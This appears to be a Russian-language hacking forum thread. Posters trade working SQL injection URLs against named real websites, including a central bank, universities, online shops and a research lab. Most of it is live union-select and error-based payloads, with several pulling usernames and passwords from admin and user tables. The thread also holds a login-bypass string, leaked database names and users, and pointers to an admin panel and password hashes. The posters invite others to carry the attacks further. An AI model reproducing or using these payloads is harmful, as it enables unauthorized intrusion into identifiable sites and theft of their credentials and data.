Продолжу тему авиации-теперь сайт по продаже самолетов Code: http://www.businessair.ru/info/news.php?id=-375+union+select+1,user(),3,4,5,6+--+
http://skydot.lanl.gov для получения данных используют SQL запросы(точнее только select)... http://skydot.lanl.gov/nsvs/nsvs.php без комментариев...
http://teh-rezina.ru/?id=999+union+select+1,user(),version(),4,5,6 5.0.51a-24+lenny1 trezina@localhost ---------- http://oleg-stecenko.biz.ua/index.php?show=product&cat=135&im=&par3=&par4=&par2=&pid=-1+union+select+1,2,3,4,5,6,7,8,version(),10,user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 oleg@localhost:5.0.24
Bank of Afghanistan Code: http://www.centralbank.gov.af/CompleteNewsDescription.php?NewsId=-13+union+ALL+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5-- --- Version: 5.0.91-community Database: cbank_dabwebsite User: cbank_root@localhost --- п.с ..за мной выехали ..ы
Code: http://www.moodiereport.com/category.php?id=-31+union+select+1,2,3,GROUP_CONCAT%28concat_ws%280x3a,table_schema,TABLE_NAME%29+SEPARATOR+0x3C62723E%29,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+column_name+like+0x257061737325+or+column_name+like+0x25702577256425--+
PR 3 Code: http://www.worldnet-intl.com/services.php?id=3&&s=-9%20Union%20Select%201,database%28%29,3,4,5,6,7,8,9,10%20-- Version = 5.0.51a-24+lenny4 Database = worldnet_db User = [email protected] Code: http://www.franchisetoown.com/franchise_detail.php?id=412+and+1=0+%20Union%20Select%20%201,2,3,4,5,6,7,8,9,10,11,12,13,UNHEX%28HEX%28version%28%29%29%29,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20-- Version = 5.0.41-community-log User = [email protected] Database = franchi_fto
Code: http://www.pucp.edu.pe/puntoedu/index.php?option=com_categorias&cat=-30+UNION+SELECT+1,2,concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20jos_users%20limit%200,1-- Code: http://www.pucp.edu.pe/puntoedu/index.php?option=com_categorias&cat=-30+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20jos_users%20limit%200,1-- Version: bd_puntoedu Database: 5.0.77 Username: ]puntoedu_user@localhost Google PR: 7 Второй пароль на админке...
Code: http://www.localfirstaz.com/directory/view-cat.php?id=-23+union+select+1,2,3,GROUP_CONCAT%28concat_ws%280x3a,table_schema,TABLE_NAME%29+SEPARATOR+0x3C62723E%29+from+information_schema.columns+where+column_name+like+0x257061737325+or+column_name+like+0x25702577256425--+
http://mombaby.med.unc.edu/index.php?c=2&s=58&p=-333+union/*ii*/select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9+from+information_schema.columns-- http://www.corpusgallery.com/exhibitions.php?id=-21'+union+select+1,2,3,version(),5,6,7/*
http://www.digitalcarversguild.com/plugin.php?ProductId=-18+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- http://www.maverickentertainment.cc/filmdetail.php?ProductID=724+and+ascii(lower(substring(user(),1,1)))=109 http://www.eonclash.com/ViewProduct.php?ProductID=-26+union+select+1,2,concat(username,char(58),user_password),4,5,6,7,8+from+users
PR5 http://www.rtuni.org/extendedschools/page.php?page_id=-1+union+select+1,2,3,4,5,6,7,version(),9-- Database Version: 5.0.90-community Database name: bbritton_rtu User name: bbritton_root@localhost
http://www.positivenetworks.com/page.php?pageID=3'+or+(1,1)=(select+count(0),concat((select+table_name+from+information_schema.tables+where+table_name=(select+table_name+from+information_schema.tables+where+table_rows>ascii(lower(substring(version(),1,1)))limit+0,1)+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+
Code: http://www.inab.org/?option=com_projects&Itemid=62&idProyecto=-336+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- Version: 5.0.22-Debian_0ubuntu6.06.2-log Database: personal Username: inb@localhost Google PR: 5
http://youronesourcefitness.com/trainers.php?id=30+union+select+concat_ws(0x3a,@@version,@@version_compile_os,@@version_comment,@@version_compile_machine),2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2 http://www.limelight-software.com/article.php?id=-59+union+select+1,2,aes_decrypt(aes_encrypt(version(),1),1),4,5,6,7 http://www.yangdentalgroup.net/nl/article.php?id=1512;select+version()::int,null,null,null,null,null,null,null,null,null,null,null,null,null,null&type=col http://www.unitedpurpose.org/archive/article.php?id=100+union+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13+from+information_schema.`tables`+where+table_schema=database() http://www.duesseldorf.feg.de/static/sebalu2/article.php?id=-48+union+select+1,2,3,4,5,6,7,8,9 http://www.israel-diaspora.info/article.php?id=-853+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13 http://www.eleganthomesinwesttoronto.com/ShowResources.cfm?Pageid=(select+top+1+table_name+from+information_schema.tables)&TypeOfPage=2 http://www.musicforpercussion.com/php/NewsDetail.php?ID=-130+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14-- http://www.odessachamber.com/newsdetail.php?id=14'+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+ http://www.dkggroup.com/newsdetail.php?id=165+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+ http://www.tango04.com/news/newsdetail.php?id=-361+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13 http://www.dutchtub.com/english00/newsdetail.php?id=-207+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34&titel=eco_gadget_of_the_year! http://www.marmoon.com/games.php?id=-437+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13 http://www.dakamericas.com/newsdetail.php?id=19'+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+ http://www.bathfringe.co.uk/page.php?pageid=38+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31&PHPSESSID='2ebe0d1ced95240449e5f9ec7bb9219c
Code: http://www.iccu.sbn.it/genera.jsp?id=-1+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by++concat(mid(version(),1,63),+floor(rand(0)*2)))--+ PR - 7 ps. кому не лень, можете и докрутить ;-) Небольшой хостинг картинок Code: http://pixca.ru/login.php sql inj в POST данных. логика запроса SELECT * FROM ??? WHERE (login = '#login#') and (password = '#password#'). можно зайти под любым пользователем : D l: #login#') or 1=1# p: put smth here
http://www.eonclash.com/ViewProduct.php?ProductID=27+and+substring(version(),1,1)=4 http://www.rdmarket.ru/index.php?productID=1492'+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+17,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+ http://stroymag.kiev.ua/index.php?productID=342+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.columns+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+ http://www.vk4ajj.com/cubecart/index.php?_a=viewProd&productId=342+or+(1,1)=(select+count(0),concat((select+password+from+CubeCart_admin_users+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+ (http://www.vk4ajj.com/cubecart/modules/3rdparty/Estelles_Mod_Store/css/php.ini) http://www.eventphotocards.com/index.php?_a=viewProd&productId=342+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+
Шоп http://www.fitshop.de/de/kategorie/riegel/18/index.html?br[0]=4+and+row(1,2)in(select+count(*),concat((select+concat(table_name,0x3a,column_name)+from+information_schema.columns+where+column_name+like+0x257061737325+limit+1,1),0x3a,floor(rand(0)*2))as+a+from+information_schema.columns+x+group+by+a) Script: /de/kategorie/riegel/18/index.html? http://fitshop.de/sqladmin/ хеши в соседном разделе.
продолжаем шопы http://www.gskpiter.ru/index.php?productID=36+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+